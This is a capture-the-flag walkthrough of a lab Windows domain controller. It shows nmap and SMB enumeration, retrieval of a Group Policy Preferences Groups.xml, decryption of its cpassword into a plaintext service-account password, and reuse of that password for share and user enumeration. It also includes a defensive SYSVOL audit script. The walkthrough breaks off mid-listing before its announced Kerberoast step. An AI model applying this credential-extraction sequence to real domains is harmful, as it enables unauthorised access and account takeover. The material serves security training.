This machine appears to be vulnerable to the devastating Zerologon, but this write-up goes over the Group Policy Preferences (cpassword) / Ticket Granting Service (Kerberoast) path instead.
Run nmap to see what's open. The name of the machine should make what we're looking for obvious.
$ nmap -vvv -sC -sV -oA nmap/active.nmap 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 20:16 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Initiating Ping Scan at 20:16
Scanning 10.10.10.100 [4 ports]
Completed Ping Scan at 20:16, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:16
Completed Parallel DNS resolution of 1 host. at 20:16, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:16
Scanning 10.10.10.100 [1000 ports]
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Completed SYN Stealth Scan at 20:18, 143.85s elapsed (1000 total ports)
Initiating Service scan at 20:18
Scanning 18 services on 10.10.10.100
Completed Service scan at 20:20, 62.61s elapsed (18 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:20
Completed NSE at 20:20, 9.47s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:20
Completed NSE at 20:20, 5.36s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:20
Completed NSE at 20:20, 0.00s elapsed
Nmap scan report for 10.10.10.100
Host is up, received echo-reply ttl 127 (0.086s latency).
Scanned at 2022-09-07 20:16:33 EDT for 221s
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-09-08 00:19:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
...or just get the ports:
$ nmap -T5 -Pn 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 14:14 EDT
Nmap scan report for active.htb (10.10.10.100)
Host is up (1.5s latency).
Not shown: 866 closed tcp ports (reset), 116 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds
The ports, services and versions that tell us what this box is and, most likely, what we need to do:
53/tcp domain Microsoft DNS 6.1.7601 windows server 2008 R2 SP1
88/tcp kerberos Microsoft Windows Kerberos (server time: 2018-11-25 16:56:31)
389/tcp ldap Microsoft Windows AD active.htb
445/tcp microsoft-ds - but no shares open
It does look like a domain controller with these ports: 53, 88, 389.
Optionally, add an entry to the hosts file (with vim or nano) so that active.htb resolves to the target and can be used in place of the IP address:
vim /etc/hosts
10.10.10.100 active.htb
nano /etc/hosts
10.10.10.100 active.htb
Run smbmap against the host to list the shares and their permissions.
$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Take a peek inside Replication.
$ smbmap -R Replication -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
List the Active Directory users with GetADUsers.py (this is run as svc_tgs, whose password is recovered further down; Impacket prompts for it):
$ GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 15:06:40 2022-09-26 18:24:04
Guest <never> <never>
krbtgt 2018-07-18 14:50:36 <never>
SVC_TGS 2018-07-18 16:14:38 2018-07-21 10:01:30
Connect to SMB:
$ smbclient -L \\\\10.10.10.100\\
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
There is a problem at the end of the connection (the SMB1 workgroup listing fails). Try connecting to the Replication share directly:
$ smbclient -L \\\\10.10.10.100\\Replication
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
It's still not connecting cleanly. Try the -N (--no-pass) option with the share path:
$ smbclient -N \\\\10.10.10.100/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> recurse on
After disabling prompt and enabling recurse, list the files.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
\active.htb
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
\active.htb\DfsrPrivate
. DHS 0 Sat Jul 21 06:37:44 2018
.. DHS 0 Sat Jul 21 06:37:44 2018
ConflictAndDeleted D 0 Wed Jul 18 14:51:30 2018
Deleted D 0 Wed Jul 18 14:51:30 2018
Installing D 0 Wed Jul 18 14:51:30 2018
\active.htb\Policies
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018
\active.htb\scripts
. D 0 Wed Jul 18 14:48:57 2018
.. D 0 Wed Jul 18 14:48:57 2018
\active.htb\DfsrPrivate\ConflictAndDeleted
. D 0 Wed Jul 18 14:51:30 2018
.. D 0 Wed Jul 18 14:51:30 2018
\active.htb\DfsrPrivate\Deleted
. D 0 Wed Jul 18 14:51:30 2018
.. D 0 Wed Jul 18 14:51:30 2018
\active.htb\DfsrPrivate\Installing
. D 0 Wed Jul 18 14:51:30 2018
.. D 0 Wed Jul 18 14:51:30 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 23 Wed Jul 18 16:46:06 2018
Group Policy D 0 Sat Jul 21 06:37:44 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 22 Wed Jul 18 14:49:12 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPE.INI A 119 Wed Jul 18 16:46:06 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
Preferences D 0 Sat Jul 21 06:37:44 2018
Registry.pol A 2788 Wed Jul 18 14:53:45 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
. D 0 Wed Jul 18 14:49:12 2018
.. D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
. D 0 Wed Jul 18 14:49:12 2018
.. D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Windows NT D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Windows NT D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
SecEdit D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
SecEdit D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GptTmpl.inf A 1098 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GptTmpl.inf A 3722 Wed Jul 18 14:49:12 2018
5217023 blocks of size 4096. 284696 blocks available
There are some interesting files in here. Groups.xml might have some information inside. Download everything:
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (5.6 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.6 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.2 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (8.0 KiloBytes/sec) (average 3.1 KiloBytes/sec)
The mget output (and the recursive listing above) shows where Groups.xml sits:
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
Or search for it with locate or find:
locate Groups.xml
find . -type f
Locate the file and see what it contains:
$ cd active.htb/
$ find . -iname Groups.xml 2> /dev/null
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
It appears to have everything needed to gain access to the machine.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
SVC_TGS is the Ticket Granting Service account. Copy the name or userName and the cpassword:
name="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Decrypt the cpassword with gpp-decrypt (the value is not a hash but AES-encrypted with a key Microsoft published, so there is nothing to crack):
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
With the password recovered, we now have a set of domain credentials:
active.htb\svc_tgs
GPP_PASSWORD
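From the defender's side the problem is not just this one file: any Groups.xml (or Services.xml, ScheduledTasks.xml, ...) left in SYSVOL with a cpassword attribute is readable by every domain user. The audit script below is an added example, not part of the original write-up; it walks a directory such as the active.htb/ tree pulled down with mget, reports every stored cpassword with its GPO GUID and account, and decrypts nothing. The Groups.xml it checks is the one from this page; the ScheduledTasks.xml is a constructed, simplified negative case.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Preference file types that can carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")


@dataclass
class Finding:
    path: str        # file that carries the secret
    gpo_guid: str    # GPO folder it belongs to (taken from the path)
    element: str     # XML element type: User, Task, Service, ...
    account: str     # account whose password is stored
    cpassword: str   # raw encrypted value; deliberately not decrypted here


def find_cpasswords(root_dir: str) -> list[Finding]:
    """Walk root_dir, parse each preference XML, report non-empty cpassword attributes."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            m = GUID_RE.search(path)
            guid = m.group(0) if m else "<no GPO GUID in path>"
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed file: worth logging, but not a finding
            # cpassword sits on <Properties>; the account name is on the parent
            # element (name=) or on Properties itself (userName=, runAs=, accountName=).
            for parent in tree.iter():
                for props in parent.findall("Properties"):
                    cp = props.get("cpassword")
                    if not cp:  # attribute absent or empty: no stored password
                        continue
                    account = (props.get("userName") or props.get("runAs")
                               or props.get("accountName") or parent.get("name") or "?")
                    findings.append(Finding(path, guid, parent.tag, account, cp))
    return findings


# The Groups.xml recovered from the Replication share above, verbatim.
PAGE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" '
    'image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">'
    '<Properties action="U" newName="" fullName="" description="" '
    'cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" '
    'changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" '
    'userName="active.htb\\SVC_TGS"/></User>\n</Groups>\n'
)
# Constructed, simplified scheduled-task preference with no stored password: not reported.
CLEAN_TASKS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<ScheduledTasks><Task name="Cleanup">'
    '<Properties action="C" runAs="NT AUTHORITY\\SYSTEM" appName="cleanup.cmd"/>'
    '</Task></ScheduledTasks>\n'
)


def demo_on_page_sample() -> list[Finding]:
    """Build a mock SYSVOL tree from the two files above and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        prefs = os.path.join(tmp, "active.htb", "Policies",
                             "{31B2F340-016D-11D2-945F-00C04FB984F9}", "MACHINE", "Preferences")
        os.makedirs(os.path.join(prefs, "Groups"))
        os.makedirs(os.path.join(prefs, "ScheduledTasks"))
        with open(os.path.join(prefs, "Groups", "Groups.xml"), "w", encoding="utf-8") as f:
            f.write(PAGE_GROUPS_XML)
        with open(os.path.join(prefs, "ScheduledTasks", "ScheduledTasks.xml"), "w",
                  encoding="utf-8") as f:
            f.write(CLEAN_TASKS_XML)
        return find_cpasswords(tmp)


if __name__ == "__main__":
    # Remediation: MS14-025 stops new cpassword values from being written, but files
    # already in SYSVOL stay readable by every domain user until they are deleted,
    # and the stored account's password has to be rotated.
    for f in demo_on_page_sample():
        print(f"[!] {f.gpo_guid} {f.element} {f.account}: cpassword in {f.path}")
```

Point find_cpasswords() at a real SYSVOL export (or a mounted \\dc\SYSVOL) to audit a live domain.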
Now use smbmap to see the permissions of this account:
$ smbmap -u svc_tgs -d active.htb -p GPP_PASSWORD -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
READ ONLY for multiple shares. Check inside Users:
$ smbmap -u svc_tgs -d active.htb -p GPP_PASSWORD -H 10.10.10.100 -R Users
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
Users READ ONLY
.\Users\*
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 06:14:21 2018 Administrator
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 All Users
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Default
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Default User
fr--r--r-- 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
.\Users\Default\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 AppData
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Cookies
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Desktop
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Documents
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Downloads
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Favorites
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Links
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Local Settings
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Documents
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 NetHood
fr--r--r-- 262144 Mon Jul 30 09:47:52 2018 NTUSER.DAT
fr--r--r-- 1024 Mon Jul 16 17:01:17 2018 NTUSER.DAT.LOG
fr--r--r-- 95232 Mon Jul 30 09:47:52 2018 NTUSER.DAT.LOG1
fr--r--r-- 0 Mon Jul 16 17:08:47 2018 NTUSER.DAT.LOG2
fr--r--r-- 65536 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 PrintHood
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Recent
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Saved Games
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 SendTo
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Templates
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Videos
.\Users\Default\AppData\*
